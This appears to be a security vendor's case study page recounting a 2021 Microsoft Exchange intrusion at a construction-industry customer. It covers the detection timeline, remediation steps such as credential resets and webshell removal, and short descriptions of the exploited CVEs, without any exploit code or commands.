Microsoft Exchange Vulnerability TIME From Detection to Escalation: 20 MINUTES
In this real-world attack example, an Arctic Wolf customer in the construction industry experienced a vulnerability-based incident. The threat actor leveraged multiple Microsoft Exchange vulnerabilities for access, but Arctic Wolf helped this customer swiftly stop the incident and create a long-term fix for these vulnerabilities.
View Timeline Navigation
On Tuesday, March 2, 2021
one week ahead of its typical Patch Tuesday release, Microsoft released an out-of-band patch to address multiple critical vulnerabilities in Microsoft Exchange, the company’s email and calendar server.
What do these vulnerabilities mean?
ATTACKER'S 5-MONTH WINDOW
-
March 2021
Microsoft releases out-of-band patch to address multiple critical vulnerabilities within Microsoft Exchange
-
April 2021
Microsoft releases security updates for a second set of RCE vulnerabilities within Microsoft Exchange
-
May - July 2021
These collections of vulnerabilities are dubbed ProxyShell, with bad actors leveraging three separate vulnerabilities as part of a single attack to bypass authentication and execute code
-
August 2nd, 2021
Customer completes onboarding with Arctic Wolf
5:00 p.m. | Monday, August 2
Source: Customer Onboarding
7:27 p.m. | Saturday, August 7
Source: Arctic Wolf Agent
7:29 - 7:47 p.m. | Saturday, August 7
Arctic Wolf Triage Team: Investigation Begins
7:50 p.m. | Saturday, August 7
Monitoring Continues: Arctic Wolf Aurora™ Platform
Log Source: Arctic Wolf Sensor
IP 135.181.x.x associated with C2 server in Finland
8:08 p.m. | Saturday, August 7 |
Source: Arctic Wolf Agent
8:09 p.m. | Saturday, August 7
Source: SentinelOne / Arctic Wolf Agent
Begin Post-Incident Zone
9:00 a.m. | Monday, August 9
Remediation
Arctic Wolf sets up virtual call with [CUSTOMER] to step through the remediation process.
Delete SVN.exe
Delete [User1] account and reset [Admin] account
Reset credentials for any cached users on [Exchange Server]
Reset any domain credentials that accessed the server after Saturday, August 7
Implement firewall blocking rules
Next, the security journey continues
Attack Timeline:
with our concierge security®team
Although many managed detection and response services would end once the threat was remediated, the Concierge Security® Team is focused on using this attack to improve the security posture of the customer.
The Arctic Wolf Concierge Security Team provides your team with coverage, security operations expertise, and strategically tailored security recommendations to continuously improve your overall posture.
Arctic Wolf CST initiates vulnerability scan on [User1] account and reset [Exchange Server]. The scan identifies missing critical patches dating back 6+ months, including zero-days.
[Customer] confirms their third-party patching tool is malfunctioning.
Arctic Wolf CST delivers script to identify Exchange breaches prior to Arctic Wolf onboarding, and the script identifies Backdoor:ASP/Buonpower.A!dha.
Pre-existing webshell is removed.
Multi-factor authentication (MFA) for VPN and Office 365 enabled.
GPO to prevent enumeration created.
Arctic Wolf prioritizes keeping our customers and the general public informed of new vulnerabilities and security risks.
Real-World Examples
Microsoft Exchange Vulnerabilities and Patch Guidance
In the example above, an attacker leveraged the Microsoft Exchange Vulnerabilities released in early 2021 on a customer in the construction industry.
Detailed guidance and links to available patches have been provided by Microsoft here.
CVE-2021-26857
CVE-2021-26858 and CVE-2021-27065
These two are post-authentication arbitrary file write vulnerabilities in Exchange.
If an attacker can authenticate with the Exchange Server, then they can use one of these vulnerabilities to write a file to any path on the server. Microsoft also observed HAFNIUM chain CVE-2021-26855 with this one to authenticate with elevated privileges.
